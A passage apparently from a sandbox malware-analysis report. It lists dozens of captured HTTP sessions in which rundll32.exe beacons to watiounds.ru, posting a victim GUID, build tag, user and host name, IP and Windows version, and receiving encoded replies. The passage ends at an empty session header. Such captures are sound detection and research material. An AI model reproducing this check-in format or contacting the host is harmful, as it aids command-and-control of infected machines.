                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.22 | 49166 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:16:14.826397896 CEST | 2 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:16:14.968997002 CEST | 3 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:16:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 33 34 0d 0a 4d 4a 51 4e 41 52 68 41 45 67 34 4f 43 6b 42 56 56 52 30 49 44 30 31 4e 56 41 67 50 56 55 77 63 48 67 6b 64 54 6b 38 66 45 68 34 63 56 42 38 43 48 77 63 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 34MJQNARhAEg4OCkBVVR0ID01NVAgPVUwcHgkdTk8fEh4cVB8CHwc=0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          10 | 192.168.2.22 | 49175 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:18:47.319185019 CEST | 29 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:18:47.441540003 CEST | 29 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:18:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVKPEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          100 | 192.168.2.22 | 49265 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:09.532520056 CEST | 147 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:09.657797098 CEST | 147 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 51 4a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQQJJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          101 | 192.168.2.22 | 49266 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:09.989902973 CEST | 148 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:10.122634888 CEST | 148 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCAZXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          102 | 192.168.2.22 | 49267 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:10.442804098 CEST | 149 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:10.569025993 CEST | 149 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCZAXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          103 | 192.168.2.22 | 49268 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:10.888163090 CEST | 150 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:11.011018991 CEST | 151 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 42 59 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBBYYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          104 | 192.168.2.22 | 49269 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:11.333842039 CEST | 151 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:11.465650082 CEST | 152 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4b 50 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHKPSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          105 | 192.168.2.22 | 49270 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:11.779228926 CEST | 152 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:11.902065992 CEST | 153 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFKPUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          106 | 192.168.2.22 | 49271 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:12.212189913 CEST | 154 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:12.333988905 CEST | 154 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNHSMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          107 | 192.168.2.22 | 49272 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:12.650474072 CEST | 155 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:12.773057938 CEST | 155 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 42 59 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHBYSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          108 | 192.168.2.22 | 49273 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:13.087593079 CEST | 156 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:13.209937096 CEST | 156 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZBYAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          109 | 192.168.2.22 | 49274 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:13.518112898 CEST | 157 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:13.640049934 CEST | 157 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAAZZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          11 | 192.168.2.22 | 49176 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:19:02.541588068 CEST | 31 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:19:02.672355890 CEST | 32 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:19:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 59 42 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCYBXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          110 | 192.168.2.22 | 49275 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:13.961709976 CEST | 158 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:14.088989019 CEST | 158 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4a 51 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVJQEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          111 | 192.168.2.22 | 49276 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:14.420356035 CEST | 159 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:14.547636986 CEST | 160 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 48 53 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMHSNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          112 | 192.168.2.22 | 49277 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:14.873043060 CEST | 160 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:15.002720118 CEST | 161 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQTGJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          113 | 192.168.2.22 | 49278 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:15.325035095 CEST | 161 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:15.447942019 CEST | 162 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 47 54 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMGTNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          114 | 192.168.2.22 | 49279 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:15.767858028 CEST | 163 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:15.891278028 CEST | 163 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:15 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKMNPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          115 | 192.168.2.22 | 49280 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:16.203042030 CEST | 164 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:16.326600075 CEST | 164 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:16 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4b 50 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYKPBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          116 | 192.168.2.22 | 49281 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
